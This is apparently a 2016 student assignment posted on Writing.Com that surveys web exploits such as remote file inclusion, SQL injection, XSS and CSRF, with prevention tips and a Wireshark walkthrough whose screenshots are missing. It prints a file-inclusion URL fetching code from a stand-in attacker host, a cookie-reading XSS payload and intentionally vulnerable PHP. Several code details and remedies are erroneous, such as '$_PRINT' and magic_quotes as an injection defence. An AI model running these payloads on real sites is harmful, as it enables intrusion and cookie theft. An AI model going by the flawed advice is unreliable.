\"Writing.Com
*Magnify*
SPONSORED LINKS
Printed from https://writing.com/main/view_item/item_id/2097951-WEB-SECURITY-EXPLOITATIONS
Item Icon
Rated: E · Assignment · Computers · #2097951
Web security exploitations are a major challenge for Internet users.
         
WEB SECURITY EXPLOITATIONS AND          APPLICATIONS 12

         








Name:

Professors' Name:

Institution:









WEB SECURITY EXPLOITATIONS AND APPLICATIONS
Executive Summary

Web security exploitations are a major challenge for Internet users. For an individual to safely use the internet, one must be equipped with adequate security mechanisms. It will help in shunning the hackers and attackers from accessing private data or manipulating personal information. Applications like wire shark are essential when using the internet. The rest of this document examine and explore the topic above
Introduction

In today's world there is a rapid increase of information exchange and sharing in social networking. There is also a tendency of many businesses shifting from manual business adoption to online, electronic commerce transactions and e-commerce. Many websites experience attacks from hackers frequently, and users accessing the sites has not been out either. The majority of the attacks results from poor programming syntax and flawed coding. Attackers use Cross-site scripting (XSS), and SQL injection
Counteracting this problem web application security has ultimate attention. This is a component of Information Security that specifically addresses the security issue of web services, online applications, portals, and websites. It operates by applying principles of application security onto the internet systems. This paper elaborates on the safety exploits performed on web applications; security exploits carried out on websites, possible preventive measures and state examples of vulnerable applications.
Security exploits carried out on web applications

There are several security exploits conducted on web applications. They majorly occur due to poor programming and inefficient software development procedures. Considering web applications, the following are five common vulnerabilities namely; Remote code execution, SQL injection, Format string vulnerabilities, Cross Site Scripting (XSS) and Username enumeration.
(A). Remote Code Execution

RCE the ability of an attacker to access individual's computing device such as computer and make modifications despite the geographical location of the instrument. RCE the attacker to run malicious codes that control the affected system. After accessing the system, they alter user privileges and elevate their own. The efficient way to avoid Remote Code Execution is to fix holes that can allow the attacker to gain access. (Moore, T., and Clayton, R., 2009). Microsoft regularly releases patches that are security oriented to address this issue. Previously vulnerable applications are PhpBB, PayPal cart, Invision Board, Drupal, and Cpanel.
The Register_globals in PHP controls the availability of variables that are "super global" (data recorded from end user's form and data from cookies. By default, this register is always "on" which is less secure and attackers widely explore this. If supports remote uninitialized variables which are used by attackers to attach malicious files that are executable on local or remote devices. Example: require ($webpage. ".php"); here is the exploit code: http://www.vulnsite.com/index.php?webpage=http://www.hacker.com/hack.txt
Note the file "hack.txt" from the website "www.hacker.com" is executed on the server. Prevention: Latest versions of PHP have register_globals set off, and it is critical for a developer to sanitize user input before processing.
(B). SQL Injection

The SQL injection attack is where an attacker executes malicious payloads which are SQL statements to control Relational Database Management System. SQL Injection can affect any web application and is most harmful and prevalent. An attacker uses it to bypass authorization procedure, authentication mechanisms and retrieve entire database. It can also be used to tamper with data integrity by modifying contents of a database which includes sensitive data such as client's data, Personal Identification Information, secrets and intellectual property. (Zhao, J.J., and Zhao, S.Y., 2010.)
The attacker initially finds a user input and includes it directly within an SQL statement then inserts a payload as part of a query and execute it against the web server containing the database. Example of vulnerable code: <form action="SQL.php" method="PRINT" /> <p>Name: <input type="text" name="name" /><br /> <input type="submit" value="Add Comment" /></p> </form> <?PHP $query = "SELECT * FROM users WHERE username = '{$_PRINT['username']}"; $result = mysql_query($query); ?> So when including a non-malicious username (freelancer) the question becomes: $query = "SELECT * FROM users WHERE username = 'freelancer'"; Prevention: Avoid connecting to the database as the owner or super-user, when the PHP magic_quotes_gpc function is set on then POST, COOKIE, GET data are evades automatically.
(C). Format String Vulnerabilities

Format string vulnerabilities occur from the usage of unfiltered input by the user. The attacker uses format tokens to print data from memory locations and data stack. The commonly used format tokens are %s and %x. Format string exploits are classified into three general categories which are the denial of service, reading and writing attacks/ Utilization of the format specifier (%s) which is the refusal of service attack on multiple cases cause the program or web application to crash. Reading attacks for printing memory sections that users don't have access to format specifier(%x). The format specifiers (%d, %u or %x) is used for writing attacks to overwrite and execute user-offered shell code. Here is code in miniserv.pl that causes vulnerability in Webmin: if ($use_syslog && !$validated) { Syslog("crit", ($nonexist ? "Non-existent" : $expired ? "Expired": "Invalid"). " login as $authuser from $acpthost"); } Prevention: Always edit the source to verify input properly.
(D). Cross Site Scripting (XSS)

Cross Site Scripting is whereby an attacker creates a malicious URL, which is crafted to appear legitimate at the first look. When the web user visits such sites, the attacker can run a malicious bug in the victim's browser. XSS is possible in situations where user's input data is displayed. The attractive targets are search engines that show 'n' results found for '$_search' main word, forums for discussion that support script tags and login that shows an error text for incorrect login accompanied by login entered. It can also be used to steal cookies then hijack a user session. ( Ganesh, V., Kie?un, A., Artzi, S., Guo, P.J., Hooimeijer, P. and Ernst, M., 2011.)
Example of vulnerable code to XSS attack: <form action="search.php" method="GET" /> Welcome!! <p>Enter search : <input type="text" name="name_1" /><br /> <input type="submit" value="Go" /></p><br> </form> <?php echo "<p>Your Name <br />"; echo ($_GET[name_1]); ?> In this example the passed value to the variable "Name_A" is not sanitized and it can be exploited to execute arbitrary script: http://victim_site/clean.php?name_A=<script>code</script> or http://victim_site/clean.php?name_A=<script>alert(document.cookie);</script> Prevention: Correct coding. The above codes can be edited as : <?php $html= htmlentities ($_GET['name_1'],ENT_QUOTES, 'UTF-8'); echo "<p>Your Name<br />"; echo ($html); ?>
(E). Username Enumeration

Username enumeration is attack type that involves the backend validation telling the attacker if provided username is valid or invalid. This allows the attacker to experiment with several usernames and know valid ones with the help of error messages displayed. Username enumeration assists the attacker who uses usernames with guessable passwords like user/user, admin/admin, and guest/guest. Such accounts are always for testing purposes and developers forgets to change details or don't disable them after testing. They always contains guessable login accompanied by sensitive information like passport details, credit card numbers and other crucial information which can be used during social engineering attacks. (Moore, T. and Clayton, R., 2009)
Prevention: To prevent exposing valid usernames always the application should always display consistent messages when an error occurs. All data used during testing should be deleted when testing is done.
Security exploits performed on websites.

(a). Broken Authentication- This generally occurs when the session id is leaked in referrer header to an attacker by the URL. Passwords that are not encrypted in transit or storage result to this exploitation. If session fixation is possible, and when timeouts are not implemented right or using HTTPS, session hijack is possible. Prevention: use a framework in case you cannot create your code. (Whitaker, A., Shaw, M. and Gribble, S.D., 2002.)

(b).Insecure Direct Object References is where an internal object like files or primary key in a database is exposed to the user. If the code has "download.php" and allows the user to access data and authorization code "download.php?" file=abcdef.txt" is omitted, the attacker can use this download any system file that the running PHP has access. Prevention: Be very rigorous when performing user authorization. It should be done properly, consistently and precisely. (Zhao, J.J., and Zhao, S.Y., 2010.)
(c). Security Misconfiguration- Security misconfiguration occurs under the following circumstances: when an application is run with debug mode enabled in production; Enabling directory listing on servers; Using outdated software; Enabling of unnecessary services on the device; Ignoring to change default keys and passwords. Prevention: Have an excellent automated "create and execute" process which can perform test runs before deploy. ( Ganesh, V., Kie?un, A., Artzi, S., Guo, P.J., Hooimeijer, P. and Ernst, M., 2011.)
(e).Sensitive Data Exposure. - Sensitive data such as credit card information, Passport numbers, bank accounts and other personal data should never travel or get stored unencrypted. Passwords also if are not hashed can be easily stolen, the encryption algorithm should be robust and effective. Prevention: Create a secure flag for cookies and use the proper certificate for HTTPS during transit. In storage, do not store crucial information such as credit card information without encryption and passwords hashed. Make use of payment processors such as Stripe and Braintree. Use "B crypt" for hashing, salting and rainbow tablets. (Whitaker, A., Shaw, M. and Gribble, S.D., 2002.)
(f).Missing Function Level Access Control- only means that authorization is not performed when a server calls on a function. If "/admin" panel appear only to the administrator, then an attacker can discover this service and use it to disorient your system if proper authorization is missing. Prevention: Always make certain approval is done at every level of access. ( Ganesh, V., Kie?un, A., Artzi, S., Guo, P.J., Hooimeijer, P. and Ernst, M., 2011.)
(g). Cross Site Request Forgery(CSRF)-this attack is whereby a third party site controlled by the attacker sends a request to the target website( e.g. your PayPal account) using the browser with cookies. When you are logged into your PayPal account, another browsing tab can make your browser misuse its credentials for the attackers benefit. It results into the deputy browser misusing session cookies to execute the hacker's instruction. Prevention: Always save a secret token that is inaccessible by the third party site. A hidden field in the form is used to implement a secret token. (Smith, H.J., Dinev, T. and Xu, H., 2011)






Technical demo

The following are screen shots of how to use Wire shark to capture packets, Filter packets, and Inspect Packets.
First, you specify the interface of capture by clicking on it from the interface list after launching the Wire shark software as indicated by the arrow below:

Then you will start to see real-time capture of packets that are sent and received by your device as they appear in the screen shot below:

When you want to stop capturing packets click the "stop" icon as indicated on the screen shot below:

The TCP traffic is indicated by green color, DNS traffic are marked by dark blue color, UDP are shown by light blue color and TCP packets that have problems are indicated in black color:

Filtering packets: Filter packets by typing into the filter box and press enter.

Click the analyze menu and highlight Display filters in order to create a new filter indicated below:


Right click a packet and highlight "Follow TCP Stream".

A full conversation will appear between client and server as indicated by the screenshot below:


After closing the above window, the filter will be applied automatically. Below is a screenshot showing packets that make up the highlighted conversation.

To inspect a filter highlight the package then digs into it to view the components as shown below:



Another way to create filters is indicated below:

Conclusion

Web application security is essential when using the internet because it will help one to stay out of vulnerability to attackers and hackers. Effective measures are equality important which includes the use of Wire shark as a tool for debugging network protocols, examination of security challenges and inspection of network protocols. Attackers are always watching out for developers' failures in order to terrorize. Professionals should avoid ignorance at all cost
Reference.
1. Smith, H.J., Dinev, T. and Xu, H., 2011. Information privacy research: an interdisciplinary review. MIS quarterly35(4), pp.989-1016.

2. Zhao, J.J. and Zhao, S.Y., 2010. Opportunities and threats: A security assessment of state e-government websites. Government Information Quarterly27(1), pp.49-56.
3. Moore, T. and Clayton, R., 2009. Evil searching: Compromise and re-compromise of internet hosts for phishing. In Financial Cryptography and Data Security (pp. 256-272). Springer Berlin Heidelberg.
4. Whitaker, A., Shaw, M. and Gribble, S.D., 2002. Denali: Lightweight virtual machines for distributed and networked applications. Technical Report 02-02-01, University of Washington.
5. Ganesh, V., Kie?un, A., Artzi, S., Guo, P.J., Hooimeijer, P. and Ernst, M., 2011, July. HAMPI: A string solver for testing, analysis and vulnerability detection. In Computer Aided Verification (pp. 1-19). Springer Berlin Heidelberg.

© Copyright 2016 Bluemagic (geniousblacke at Writing.Com). All rights reserved.
Writing.Com, its affiliates and syndicates have been granted non-exclusive rights to display this work.
Printed from https://writing.com/main/view_item/item_id/2097951-WEB-SECURITY-EXPLOITATIONS